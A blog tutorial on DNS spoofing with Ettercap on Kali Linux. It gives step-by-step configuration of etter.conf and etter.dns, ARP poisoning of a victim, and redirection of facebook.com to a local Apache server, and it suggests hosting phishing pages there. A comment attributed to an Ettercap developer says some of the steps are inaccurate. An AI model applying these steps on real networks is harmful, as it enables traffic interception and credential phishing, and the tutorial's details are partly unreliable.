Ettercap — DNS Spoofing on Kali Linux

Attack Strategies

Ettercap — DNS Spoofing on Kali Linux

Today we gonna learn DNS spoofing in our Kali Linux system with the help of Ettercap, and How to use ettercap in Kali Linux? Before learning DNS spoofing we need a clear idea about DNS. DNS stands for Domain Name System. Domain Name System or DNS server translate a human-readable domain-name (such as google.com, nytimes.com) into a numerical IP address that is used to route communications between nodes.

ettercap

As we know every system have an unique IP address, but it is very difficult to remember IP address of many website for a human. So a domain name attached with the IP address. To reduce the effort and improve the performance DNS saves translate data for a limited time which called cache.

This means if it receives another request for same translation, it can replay without needing to ask any other servers until the cache expires.

DNS spoofing is a crucial part of penetration testing. In this method attacker can divert a domain name to a incorrect IP. This results in traffic being diverted to the attacker’s computer or any other system.

With the help of DNS spoofing attacker can inject poison in victim’s address resolution protocol, and this attack is very hard to detect.

Here for this tutorial we use Ettercap to spoof DNS. Ettercap is a very popular and easy DNS spoofing tool.

How to install ettercap on kali linux? You don’t need Ettercap comes pre-installed with Kali Linux, before open it we do some configuration. Open our terminal window and edit etter.conf file in any text editor. The file is located in /etc/ettercap/etter.conf. We use leafpad and the command will be:

leafpad /etc/ettercap/etter.conf

The screenshot is following:

etter.conf

Now we scroll down for the Linux section. The screenshot is following;

etter.conf linux

Here we use IPtables, so we active two commands of IPtable section. We just need to remove those # to active the commands. See the screenshot given below:

ettre.conf linux iptables

Then we save and close it. Then we start our apache web server by following command:

service apache2 start

Then we find our local IP by using following command:

ifconfig

The screenshot is following:

ifconfig

When we open our localhost, it is the homepage of apache web server. We can put anything in our localhost, like phishing page or any malicious web page. Now we change facebook.com domain with our localhost. Means if someone try to open facebook.com in our local network it will open our localhost page not the Facebook.

Now we need to configure another ettercap file called etter.dns by using following command :

leafpad /etc/ettercap/etter.dns

The screenshot is following:

etter.dns

Then we scrool down and set our target. See the following screenshot:

etter.dns target

We remove the highlighted link in the screenshot, and put the link we want to redirect, in our case it is facebook.com so we put it, and we also change the next line for sub-domains.
Then we will change those IP with our local IP. Then we delete the third line. The configuration shown in following screenshot:

etter.dns setting

Then we save the file and close it.
Now we open Ettercap by using following command :

ettercap -G

This will open ettercap’s Graphical User Interface(GUI) mode. The screenshot is following;

ettercap GUI

Then we click on Sniff and then Unified Sniffing. The screenshot is following:

Here we need to choose our network interface. Then it will start unified sniffing.
Now we choose our target. Before choosing target we need to stop unified sniffing. To do that we click on the “Start” menu and click on “Stop Sniffing“.

Then we go to Target menu and click on Current Target. We can see that we don’t have any target in the following screenshot:

ettercap targets

We need to scan for host. So we click on Host menu and click on Scan for Hosts.

Then we can see the Host List from the Host menu. Here we may see some hosts. We need to choose our default gateway as target 1 and victim as target 2. In our case we are the victim so we added our IP in target.

Then we go to the MITM(Man In The Middle) menu, then we click on ARP Poisoning and select “Sniff remote connection“, then click on OK. Now the ARP Poisoning is set.

The next step is we need to go into the Plugins section and then go to Manage the Plugins, and we active the dns-spoof plugin by double clicking on it.
The screenshot is following:

dns spoofing

Now we are all set. We go to the Start menu and click on the Start Sniffing.

Now we open our browser and try to open facebook.com but we will redirect ti our localhost. Here any web page we can set our localhost. If there was a phishing page then it will be very dangerous. Want to learn host malicious web pages in localhost try this tutorials:

Weeman Phishing Over Wan

ShellPhish Easy Phishing
KP

KP AKA Koushik Pal is a Security researcher and specialist focused on educating about Linux for cybersecurity and URL‑masking vulnerabilities. Creator of MaskPhish, a well‑known open‑source bash-based URL‑masking tool. Linux enthusiasts Active speaker, trainer, and advocate for secure web practices.

view all posts

Related Posts

6 comments

comments user
Unknown

My sniffing is not work wht happen brother please tell me
Reply
comments user
Kali Linux

Give me the details of error otherwise i cant help you ? Are you using Kali in Virtual machines?
Reply
comments user
Anonymous

no error message in terminal; no error on ettercap got below message in ettercap still not working . my ip was in left and target ip on right
Reply
comments user
Kali Linux

Did you updated ettercap ?
Reply
comments user
Ettercap

Hi,
I'm one of the Ettercap developers. I've been noticed about this blog by one of the Ettercap users.

It appears that this blog is providing unprecise information of how to use Ettercap to run a DNS spoof attack.

The first main issue is that uncommenting the redir_command_on, redir_command_off commands are NOT necessary to run this attack. It even lead to unwanted issues when not handled carefully, since then, Ettercap tries to intercept the SSL handshake of every SSL enabled protocol by default with it's self-signed certificate.

The second issue your blog entry introduces, is the fact that it ignores the fact of a world with IPv6 in parallel to IPv4. So while you're only spoofing responses to type A queries, the DNS resolver will in parallel fire AAAA queries, your example of etter.dns ignores. This leads to the result that the DNS resolver gets NXDOMAIN responses and A responses which seem to confuse a number of DNS resolvers. Either the Domain is there but doesn't have records for this record type or it is not there.

Please correct your blog entry in order to not spread false information.
Thanks
Alexander Koeppe
Reply
comments user
Kali Linux

Hello Alexander, We feel glad that you read our article, and we are very sorry for our content. To clear things we can say that we don't share false articles and always try to give genuine knowledge to our readers. But sometimes mistakes happen. We will correct this article as per your recommendation. Thank you very much for giving us time and making things beautiful.
Reply

Post Comment

We have to learn these